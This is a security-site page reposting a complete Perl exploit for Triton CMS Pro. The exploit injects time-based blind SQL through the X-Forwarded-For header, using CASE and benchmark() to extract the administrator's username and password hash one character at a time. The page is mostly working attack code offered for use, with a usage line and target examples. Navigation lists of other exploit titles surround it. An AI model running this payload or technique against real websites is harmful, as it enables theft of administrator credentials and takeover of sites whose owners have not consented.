首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Triton CMS Pro (X-Forwarded-For) Blind SQL Injection Exploit 来源：www.vfcocus.net 作者：GiReX 发布时间：2008-07-08   #!/usr/bin/perl -w #Triton CMS Pro (X-Forwarded-For) Blind SQL Injection #Admin's username/hash disclosure exploit #Benchmark() method, so take a coffee and relax #Coded by __GiReX__ use LWP::UserAgent; use HTTP::Request; if(not defined $ARGV[0]) { print "\nUsage: perl $0 [host] [path] [1/2]\n"; print "Example: perl $0 localhost /tcms/\n"; exit; } my $host  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];    $host .=  $ARGV[1] unless not defined $ARGV[1]; my $client =  new LWP::UserAgent; my $get    =  new HTTP::Request('GET', $host); my @cset   =  (97..122, 0);               # Only  a-z  charset for username exploit if need change it my @cset2  =  (48..57, 97..102); my $prefix =  "tc_";         my ($i, $j) = (0, 1); my ($user, $hash) = (undef, undef); banner(); while($i != $#cset) {     for($i = 0; $i <= $#cset; $i++)    {     my ($pre_time, $post_time) = time(); info(chr($cset[$i]), "Username", $user); $rv = check_char($cset[$i], $j, "username"); $post_time = time(); if($post_time - $pre_time > 3 and $rv) { $user .= chr($cset[$i]); last; }    }   $j++; } if(not defined $user) {      print STDOUT "\n\n[-] Exploit mistake: please check the benchmark and expected time\n\n"; exit; } else {      print STDOUT "\n[+] Admin Hashed Pass: \r"; } for($j = 0; $j <= 32; $j++) {      for($i = 0; $i <= $#cset2; $i++)     {      $pre_time = time(); info(chr($cset2[$i]), "Hashed Pass", $hash); $rv = check_char($cset2[$i], $j, "password"); $post_time = time();          if($post_time - $pre_time > 3 and $rv)      {          $hash .= chr($cset2[$i]);          last;      }     } } if(not defined $hash or length($hash) != 32) {      print STDOUT "\n\n[-] Exploit mistake: please check the benchmark expected time\n\n"; } else {      print STDOUT "\n\n[+] Exploit terminated\n\n"; } sub banner {    print "\n";    print "[+] Triton CMS Pro (X-Forwarded-For) Blind SQL Injection\n";    print "[+] Admin's username/hash disclosure exploit\n";    print "[+] Coded by __GiReX__\n";    print "\n"; } sub info {   my($c, $str, $cur)  =  @_; $cur = '' unless defined $cur; print  STDOUT "[+] Admin ${str}: ${cur}${c}\r"; $| = 1; } sub check_char {   my ($char, $n, $field)  =  @_ ;        $get->header('X-Forwarded-For' =>  "-1' AND ".      "CASE WHEN (SELECT ASCII(SUBSTRING(${field}, ${n}, 1)) ".      "FROM ${prefix}members WHERE id=1)=${char} ".                  "THEN benchmark(99000000, CHAR(0)) END#");     $res = $client->request($get);       return $res->is_success; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Neutrino 0.8.4 Atomic Edition ·fuzzylime cms 3.01a (file) Loc ·martPPC Pay Per Click Script ( ·Safari + Quicktime <= 7.3 RTSP ·BrewBlogger 2.1.0.1 Arbitrary ·CMailServer 5.4.6 (CMailCOM.dl ·trixbox (langChoice) Local Fil ·fuzzylime (cms) 3.01 Remote Co ·Download Accelerator Plus - DA ·ImperialBB <= 2.3.5 Remote Fil ·OllyDBG v1.10 and ImpREC v1.7f ·Thelia 1.3.5 Multiple Vulnerab   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved